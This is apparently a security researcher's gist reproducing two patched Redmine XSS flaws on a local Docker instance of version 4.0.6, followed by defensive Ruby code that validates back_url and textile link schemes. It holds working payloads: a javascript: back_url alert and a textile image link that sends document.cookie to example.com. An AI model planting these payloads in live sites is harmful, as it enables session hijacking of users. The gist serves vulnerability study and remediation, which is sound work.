@Techbrunch
Last active April 20, 2021 21:40
Redmine XSS Vulnerabilities

Redmine Security

Advisories: https://www.redmine.org/projects/redmine/wiki/Security_Advisories

Let's find a PoC for each of the following vulnerabilities:

  • Persistent XSS vulnerabilities in textile inline links (#32934)
  • XSS vulnerability due to missing back_url validation (#32850)

Both issues were fixed in 4.1.1 and 4.0.7.

Checking the diff between 4.0.6 and 4.0.7:

https://github.com/redmine/redmine/compare/4.0.6...4.0.7

Main fix for #32850: https://github.com/redmine/redmine/compare/4.0.6...4.0.7#diff-5f3fc5e3977d242572aa1d08551f5eb557de0ccaff30370838ee9df5386ea0daR1301

Main fix for #32934: https://github.com/redmine/redmine/compare/4.0.6...4.0.7#diff-7fd35a152b4d6f80a5c756100ef0ab7435852c04a2c473e9d8d0b016203b5a33R853

PoC for #32850: open http://localhost:8080/projects/test/time_entries/new?back_url=javascript:alert(1) and click Cancel; the Cancel link carries the unvalidated back_url (tested on 4.0.6).

PoC for #32934 (a textile inline image link whose target is a javascript: URL):

```textile
!nope.com(Click Me)!:javascript:document.location='example.com?cookie='+document.cookie)
```

https://www.redmine.org/projects/redmine/wiki/RedmineTextFormattingMarkdown
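Both fixes come down to the same thing: validate the scheme (and, for back_url, the host) of a URL before it is emitted into HTML. The Ruby below is an added example written for this page, not Redmine's own code. `safe_back_url` is a back_url policy of the kind #32850 needed (only a relative path or an http(s) URL on the application's own host is honoured, everything else falls back to a default), and `render_image_link` is a minimal renderer for the textile `!image(alt)!:target` form that keeps the image but drops the link when the target's scheme is not on an allow-list, which neutralizes the #32934 payload. All function and constant names, the allow-list, the backslash rule and the sample inputs are assumptions for illustration.

```ruby
require "uri"
require "cgi"

# Added example, not Redmine's code. Names and the allow-list are assumptions.
ALLOWED_LINK_SCHEMES = %w[http https ftp mailto].freeze

# Parse leniently; nil when Ruby's URI parser rejects the string outright.
def parse_url(str)
  URI.parse(str.to_s.strip)
rescue URI::InvalidURIError
  nil
end

# #32850-style policy: honour back_url only when it is a relative path on
# this application or an http(s) URL on request_host; otherwise return
# fallback. Scheme checks alone are not enough: "//evil.example" is
# protocol-relative and "/\evil.example" is treated like it by some
# browsers, so both shapes are rejected before parsing.
def safe_back_url(back_url, fallback, request_host)
  s = back_url.to_s.strip
  return fallback if s.empty?
  return fallback if s.include?("\\") || s.start_with?("//")
  uri = parse_url(s)
  return fallback if uri.nil?
  # No scheme: accept only an absolute path on this host ("/projects/...").
  return(s.start_with?("/") ? s : fallback) if uri.scheme.nil?
  # Scheme present: http(s) only, and only our own host (javascript:,
  # data:, vbscript: and foreign hosts all fall through to fallback).
  return fallback unless %w[http https].include?(uri.scheme.downcase)
  return fallback unless uri.host && uri.host.casecmp?(request_host)
  s
end

# #32934-style check. Textile inline image link syntax: !src(alt)!:target
# Render <a><img></a>, but only wrap the image in a link when the target
# is relative or its scheme is on the allow-list; a javascript: target
# loses the link and keeps the (harmless) image.
IMAGE_LINK = /\A!(?<src>[^!(]+)(?:\((?<alt>[^)]*)\))?!:(?<target>\S+)\z/

def render_image_link(textile)
  m = IMAGE_LINK.match(textile.to_s.strip)
  return nil unless m
  img = %(<img src="#{CGI.escapeHTML(m[:src])}" alt="#{CGI.escapeHTML(m[:alt].to_s)}" />)
  uri = parse_url(m[:target])
  linkable = uri && (uri.scheme.nil? || ALLOWED_LINK_SCHEMES.include?(uri.scheme.downcase))
  linkable ? %(<a href="#{CGI.escapeHTML(m[:target])}">#{img}</a>) : img
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: the two PoC payloads from this page plus a benign link.
  puts safe_back_url("javascript:alert(1)", "/projects/test", "localhost")
  puts safe_back_url("/projects/test/time_entries", "/projects/test", "localhost")
  puts render_image_link("!nope.com(Click Me)!:javascript:document.location='example.com?cookie='+document.cookie)")
  puts render_image_link("!logo.png(Redmine)!:https://www.redmine.org/")
end
```

Run it with `ruby back_url_check.rb` (any file name). The textile renderer is deliberately limited to the single `!src(alt)!:target` form so the scheme decision is visible in a few lines; a real formatter has to apply the same allow-list to every place a user-controlled URL reaches an `href`, `src` or `action` attribute.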

FYI: https://plan.io/redmine-security-scanner/

There is an official Docker image for Redmine: https://hub.docker.com/_/redmine

I used the following stack:

```yaml
# stack.yml: pins the vulnerable redmine:4.0.6 image so the PoCs above can be reproduced.
version: '3.1'

services:

  redmine:
    image: redmine:4.0.6
    restart: always
    ports:
      # Redmine listens on 3000 inside the container. This binds 8080 on all
      # interfaces; use "127.0.0.1:8080:3000" to keep the vulnerable instance local.
      - 8080:3000
    environment:
      REDMINE_DB_MYSQL: db
      REDMINE_DB_PASSWORD: example
      REDMINE_SECRET_KEY_BASE: supersecretkey

  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: example
      MYSQL_DATABASE: redmine
```

```sh
docker-compose -f stack.yml up
```